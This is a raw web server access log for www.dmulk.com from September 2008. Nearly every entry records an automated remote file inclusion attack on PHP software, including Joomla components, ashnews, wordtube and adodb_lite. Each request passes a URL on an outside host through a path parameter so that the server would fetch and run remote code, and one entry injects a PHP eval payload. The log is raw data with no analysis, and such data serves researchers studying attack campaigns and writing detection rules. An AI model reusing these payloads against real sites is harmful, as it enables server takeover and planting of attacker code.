64.202.123.186 - - [12/Sep/2008:10:31:42 -0700] "GET /logs/access_080525.log/index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:31:59 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:32:00 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:32:31 -0700] "GET /logs/access_080820.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:32:34 -0700] "GET /logs/access_080616.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:32:34 -0700] "GET /logs/access_080807.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:32:39 -0700] "GET //appserv/main.php?appserv_root=http://h1.ripway.com/copilot/files/gambar.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:32:42 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:32:45 -0700] "GET /logs/access_080816.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:33:00 -0700] "GET /logs/access_080421.log%20//config/dbutil.bck.php?confdir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:33:08 -0700] "GET /logs/access_080509.log//admin/business_inc/saveserver.php?thisdir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:33:08 -0700] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:33:09 -0700] "GET /logs/access_080518.log/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:33:09 -0700] "GET /logs/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:33:09 -0700] "GET /ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:33:10 -0700] "GET /logs/access_080508.log/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:33:14 -0700] "GET /logs/access_080518.log/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:33:14 -0700] "GET /logs/access_080508.log/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:33:14 -0700] "GET /ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:33:14 -0700] "GET /logs/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:33:15 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:33:29 -0700] "GET /logs/access_080105.log/lib/gore.php?libpath=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:10:33:41 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:10:33:45 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 200 89428 "-" "libwww-perl/5.811" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:33:47 -0700] "GET /logs/access_080508.log/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:33:48 -0700] "GET /logs/access_080518.log/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:33:48 -0700] "GET /ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:33:48 -0700] "GET /logs/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:10:33:56 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:10:33:56 -0700] "GET //ashnews.php?pathtoashnews=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:34:45 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:34:46 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:34:47 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:34:49 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:34:49 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:34:50 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:34:53 -0700] "GET /logs/access_080813.log%20/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:34:54 -0700] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:34:55 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:34:56 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:10:34:57 -0700] "GET /logs/access_080816.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:35:10 -0700] "GET /logs/errors.php?error=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:35:10 -0700] "GET /logs/access_080224.log%20%20/errors.php?error=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:35:10 -0700] "GET /logs/access_080302.log%20%20/errors.php?error=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:10:35:13 -0700] "GET /logs/access_080525.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:35:43 -0700] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:35:44 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:35:45 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:35:57 -0700] "GET /logs/access_080813.log%20/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:36:07 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:36:09 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89002 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:36:09 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.810" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:36:12 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:36:12 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:36:13 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:36:13 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89034 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:36:14 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89034 "-" "libwww-perl/5.803" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:36:14 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89018 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:36:14 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.810" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:36:14 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:36:15 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:10:36:29 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:36:29 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:36:30 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89002 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:10:36:30 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89018 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:10:36:31 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:10:36:39 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:36:41 -0700] "GET /logs/index.php?page=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:36:41 -0700] "GET /logs/access_080703.log/index.php?page=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:36:42 -0700] "GET /index.php?page=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 200 89103 "-" "libwww-perl/5.79" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:36:45 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:36:45 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89034 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:36:47 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.811" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:36:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:36:55 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:36:55 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:37:00 -0700] "GET /logs/access_080626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:10:37:09 -0700] "GET /index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89429 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.230.70 - - [12/Sep/2008:10:37:22 -0700] "GET /logs//ashnews.php?pathtoashnews=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
64.13.230.70 - - [12/Sep/2008:10:37:22 -0700] "GET //ashnews.php?pathtoashnews=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:37:28 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:37:28 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:37:29 -0700] "GET /ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:37:29 -0700] "GET /logs/access_080508.log/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:37:29 -0700] "GET /logs/access_080518.log/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:37:29 -0700] "GET /logs/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:37:29 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:37:33 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:37:34 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/idbr.txt??? HTTP/1.1" 200 89444 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:37:36 -0700] "GET /logs/access_080401.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:37:51 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:37:52 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89034 "-" "libwww-perl/5.805" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:10:37:53 -0700] "GET /logs/access_080523.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:37:53 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:37:54 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.805" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:37:54 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89034 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:37:55 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.810" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:10:37:55 -0700] "GET /logs/access_080825.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:10:38:38 -0700] "GET /logs/access_080727.log//include/admin.lib.inc.php?site_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:10:38:38 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:10:38:38 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:38:39 -0700] "GET /logs/access_080812.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:38:44 -0700] "GET /logs/access_080820.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:10:38:53 -0700] "GET /logs/access_080216.log/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:10:38:54 -0700] "GET /index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89392 "-" "libwww-perl/5.79" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:10:38:55 -0700] "GET /logs/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:38:58 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:38:58 -0700] "GET /logs/access_080127.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:38:58 -0700] "GET /logs/access_080219.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:39:15 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:39:16 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89018 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:39:17 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.803" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:39:39 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:39:41 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89034 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:39:42 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:39:43 -0700] "GET /logs/access_080828.log//phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ideaindustry.us/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:39:43 -0700] "GET //phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ideaindustry.us/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:39:43 -0700] "GET /logs//phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ideaindustry.us/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:10:39:47 -0700] "GET /logs/access_080718.log//include/admin.lib.inc.php?site_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:39:52 -0700] "GET /logs/access_080525.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:39:52 -0700] "GET /logs/access_080331.log//?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:39:52 -0700] "GET /logs/access_080616.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
